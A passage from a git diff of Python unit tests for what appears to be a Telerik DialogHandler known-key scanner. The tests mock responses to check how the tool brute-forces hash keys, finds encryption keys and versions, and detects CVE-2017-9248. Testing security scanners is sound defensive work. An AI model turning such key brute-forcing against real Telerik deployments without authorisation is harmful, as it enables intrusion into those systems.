PI6iJbYf%2FIr3IuZE1oJgqcvn7tKhQBOq4jemlZpbeQgPy0FxO0%2BDxeqI%3D" in captured.out ) - print(captured.out) def test_nomatch_PBKDF2(monkeypatch, capsys, mocker): @@ -324,13 +324,21 @@ def generate_keylist_hash(include_machinekeys): mocker.patch.object(Telerik_HashKey, "prepare_keylist", side_effect=generate_keylist_hash) with requests_mock.Mocker() as m: - # Basic Probe Detects Telerik + # Basic Probe Detects Telerik presence m.get( f"http://PBKDF2.telerik.com/Telerik.Web.UI.DialogHandler.aspx", status_code=200, text=partial_dialog_page ) m.post( f"http://PBKDF2.telerik.com/Telerik.Web.UI.DialogHandler.aspx", + additional_matcher=PBKDF2_found_key_matcher, + status_code=200, + text="Please refresh the editor page.
Error Message:Index was outside the bounds of the array", + ) + + m.post( + f"http://PBKDF2.telerik.com/Telerik.Web.UI.DialogHandler.aspx", + additional_matcher=PBKDF2_found_key_matcher_negative, status_code=200, text="
Error Message:Exception of type 'System.Exception' was thrown.
", ) @@ -345,7 +353,8 @@ def generate_keylist_hash(include_machinekeys): m.post( f"http://PBKDF2.telerik.com/Telerik.Web.UI.DialogHandler.aspx", additional_matcher=PBKDF2_version_probe_matcher_incorrect, - status_code=500, + status_code=200, + text="Could not load file or assembly 'Telerik.Web.UI, Version=1984.5.622, Culture=neutral, PublicKeyToken=121fae78165ba3d4' or one of its dependencies. The located assembly's manifest definition does not match the assembly reference. (Exception from HRESULT: 0x80131040)", ) monkeypatch.setattr( @@ -357,7 +366,7 @@ def generate_keylist_hash(include_machinekeys): print(captured.out) assert "Target is a newer version of Telerik UI" in captured.out assert ( - "Warning: MachineKeys inclusion mode is enabled, which affects this Telerik version particularly dramatically. Brute Forcing will be VERY SLOW" + "WARNING: MachineKeys inclusion mode is enabled, which affects this Telerik version particularly dramatically. Brute Forcing will be VERY SLOW" in captured.out ) print(captured.out) @@ -416,7 +425,8 @@ def test_fullrun_PBKDF1_MS(monkeypatch, capsys, mocker): m.post( f"http://PBKDF1_MS.telerik.com/Telerik.Web.UI.DialogHandler.aspx", additional_matcher=PBKDF1_MS_version_probe_matcher_incorrect, - status_code=500, + status_code=200, + text="Could not load file or assembly 'Telerik.Web.UI, Version=1984.5.622, Culture=neutral, PublicKeyToken=121fae78165ba3d4' or one of its dependencies. The located assembly's manifest definition does not match the assembly reference. (Exception from HRESULT: 0x80131040)", ) monkeypatch.setattr( @@ -425,15 +435,15 @@ def test_fullrun_PBKDF1_MS(monkeypatch, capsys, mocker): ) telerik_knownkey.main() captured = capsys.readouterr() + print(captured.out) assert "Target is a valid DialogHandler endpoint. Brute forcing Telerik Hash Key" in captured.out - assert "Found matching hashkey! [YOUR_ENCRYPTION_KEY_TO_GO_HERE]" in captured.out - assert "Found Encryption key! [d2a312d9-7af4-43de-be5a-ae717b46cea6]" in captured.out + assert "Found matching hashkey: [YOUR_ENCRYPTION_KEY_TO_GO_HERE]" in captured.out + assert "Found encryption key: [d2a312d9-7af4-43de-be5a-ae717b46cea6]" in captured.out assert "Found Telerik Version! [2018.1.117]" in captured.out assert ( "gRRgyE4BOGtN%2FLtBxeEeJDuLj%2FUwIG4oBhO5rCDfPjeH10P8Y02mDK3B%2FtsdOIrwILK7XjQiuTlTZMgHckSyb518JPAo6evNlVTPWD5AZX5l4UIUkfdJvq28UHyeBA4eC58PfA6nG7V2Q97Qwqef6cpbM6t88zvE0wJt8uUKji4ZfyBif4du8JgpDzzdSi%2BlWYd3YhzNbbfKVH%2F0sfraIHOsRvwNwrVc0V%2Fnmn%2BGlqm1rheswSONIo7BzKo04RLb232aDuWcluEWDMFdNJpzpdgcq96mWrs9KttFyRjUZ%2FhUi8ZQi0R4GXCrfHRTAYOq%2B2TNdECbAEfmA4n9Pb0BDDGDfghLV6h%2FbLrUaMWZCx6U5zCQfymn96h1t5acGgfxYMCS%2FYS7WRPytc759VdSM2KhGVmuGlupbxVz5gVOWffo5rTDQxwiPhcWYHTJlN%2FawmJfHJsJV0WvTBaW9nEPL0QeeUEu3jc7OPW9CbVufHb7Rfg7RQ%2F6Gjz5TBlzfY32lcFTsyRolWjxU3%2FVBb09tcN2EJGBnjZxpl6eFsYOvexTx0ykt0PCQagdR0DPFLPsdj7kDMrdDhpMDjsqQA0W06ULEtlR8unWsjavyK0%2B8CuTN%2BkuMzFrH10Wvqb5j3SYwANq3pyEuf3OScByrY8NVz7EzX%2BYQb5%2FByHmXi99NCHbO6ZQyHnM%2BPWYwinlnFrU6f%2BvI2ruMl35dZ%2BWWSGnEdv0DVxiedxWgqDlov31JoGaaffpBs8OO3LhtYqIixQPFbjq2wPrEcHPLgM40eYtJfduPI6exc%2BkKlxFGOyB44XjDuC4VHBPmCCFH%2FguBAatG%2FSZU1z%2Fj%2FJ0YDIVedDDdPg2NtQXjjjidSW8ISbfOk1SoLSFz04F9BmmMnPVsg9Dvtbbf%2Bz%2FhudrAo9Ys%2Fa6OzksFXxwQ%2FcSIDYVAsYkRjDMcgRv6erm8bBqgABiSF7SwBLkL75mI18fA3qCxgYDrcXZJYCIbS%2BQg9QiROf7PnRBcrnAg0G2ArfRY5gQE69DA4hvUFuXZvCbVbqQGZs7TrKNqBH40DzPqKFqhBKawuCF84zc08QzWVdbl92rAUl%2FbGi6RYzgx27pPzu7LbYLl4G8a5vtVZjuK7SchY0B7FfMvF3uQA%2FY4G%2FjqDGqGshadxalKPmwfUNbDSaatepav%2Bx4zfzQhn6cV2r8t1qz1TfHypR%2BCaAEVhEa36reVmWrAKXjr0JFOSSAQJTti%2BKhNRhaVPTgVI%2BsX%2F0pf8Fn0Zvv%2FbPL9C9L1pEAco%2FGIOV9AHNoh5E18zHcmINA2HmoZWha91ONomoIGvWnlM5USb%2FYSrXZuJDsSFFU9oal%2F45NDUNWlNVsXD%2B8RvuVsl1DY7i9iftU%2FtZpskuIldUFYmXWgMWCwk6sQAaARQoQKBEvCL6OV8UcD3bsde0ubcUG9oH140jsAW6Yh7okoKYZlL2xtp4ba7o8CS3R%2FduPuJLFY6fUexkHpvKj1Nn%2B31oQSjRywNhDdNvlczG4Z2LI73TdsZuCKnSPHNF7DNtOxmeGKZl9z9utufWZIb1FetBPy97bOOVKx69nZYTjmfv7hzBuEd5SweBD9QA2WspaycH9H01R4IXXcnrWKHkkaaVS3jDR%2F%2Bll4S0yGKlVT8EiRqLcZVX6mP2C7tmpbTE1tE%2F5ydEXkHMQ4Q75MDhO6F24ahX2rF%2FyfzuAMnR784wtXAM2E3hvVbCzu1rS9Xy1O7uSL%2Fzw1PxRlBZ%2FTwP00bUw22fQfnye%2Fb5s1NmvpWcrSX6tUNlK%2BrCHlfKSxWVhMWiZOqjMq9chUja87UzhcVXYBWZqhfuGsbRIoDQ40P6k7LDTuuzR7UuMU0nPFvGXsfwyu4UQzQppBmjwdQQlpo9GK2XAR7M2Wj5XNB5yZ3n8uMfW%2BktjiC0yW9bo0BVtvvmEOayXYwXyndHauAcJ0HpHnRLtnzNKnTKI3IY%2Fl4kYFS%2BiYUk6n0nd2eVKroYdrMjKZehZmpwmXfU3%2FWpwmt6HK%2FWKAWZzjlEUaN5zDbG%2BtGNxrjYaVvJuDn2uVtmozVU8dbCdz82O6sukqV5QZ86FFImnlZPOKcSHIFq%2F%2B1AdBG%2FUEKZ28aaadpm11H4ovyjAawjFwoWhtDsJB%2F1YbGDIqlKJ40ZOav8gu1Q%2Bv9UtpaQsDfm84FjlzlmwRQn2LF%2FBZLNmAjc8uug0sItSc2bX9d7gR9EWc3KML3PiBecc%2B6LfUkd5WyqHKPP%2FHDETbor16YGv%2Bt3d6KNtQgY3p%2B2Y8kVRCqtngKNzuid%2FXOmNTpwgKgj69id3uo8asDGcs%2B%2FVu5WjbkDNF%2FJlg2TWyTzwpr53wOKmm6tsWwf2FYScCHzXvfWjxHIR9qyGtIOembCqhaK%2Bv7NYDhaI8dAOtvz2su0yzecbzGa65MlwPIyRmv458OLvCMd1BLubANPxC3YfpMHm7x0JllAwNm4K%2BfM73Qkk6jsLwAr28YC1rvMCRONv4Q0sqEpuXfGbS212hv2LeVMq9wrORW353yq2MeRDxFnc2v0oTtVL9D7nlAlBXotJu4rT%2FzhFkH%2Be%2Fbmcbe1sgbaR4BIqrp65Nwq7RjjbB8FX8fi3xA%2BVE68b9DwmAMsub7oVbmI%2B09Wf85hjYjV5fS1xHdKqT6GRTqF9HhkiRxSIDKXzMM7pBXvzwuG%2BOWTVEBOgctSA2alhhyKvUBizsrW6TO%2FSPoX8n%2Fg3qUfufYGrb05PuoeDayC9iZEzmYc%3D" in captured.out ) - print(captured) def test_misctest_PBKDF1_MS(monkeypatch, capsys, mocker): @@ -509,11 +519,12 @@ def test_misctest_PBKDF1_MS(monkeypatch, capsys, mocker): ) telerik_knownkey.main() captured = capsys.readouterr() + print(captured.out) assert "Target is a valid DialogHandler endpoint. Brute forcing Telerik Hash Key" in captured.out assert "Found Telerik Version!" not in captured.out - assert "Since we found a valid hash key, we can check for known Telerik Encryption Keys" in captured.out + assert "SUCCESS! Found matching hashkey: [YOUR_ENCRYPTION_KEY_TO_GO_HERE]" in captured.out + assert "Now checking for known Telerik Encryption Keys..." assert "Could not identify encryption key." in captured.out - print(captured.out) def test_nomatch_PBKDF1_MS(monkeypatch, capsys, mocker): @@ -556,7 +567,8 @@ def generate_keylist_hash(include_machinekeys): ) telerik_knownkey.main() captured = capsys.readouterr() - assert "This means it should be vulnerable to CVE-2017-9248!!!" in captured.out + print(captured.out) + assert "Target appears to be a pre-2017 version without hash key (CVE-2017-9248)" in captured.out def test_badoutput_PBKDF1_MS(monkeypatch, capsys, mocker):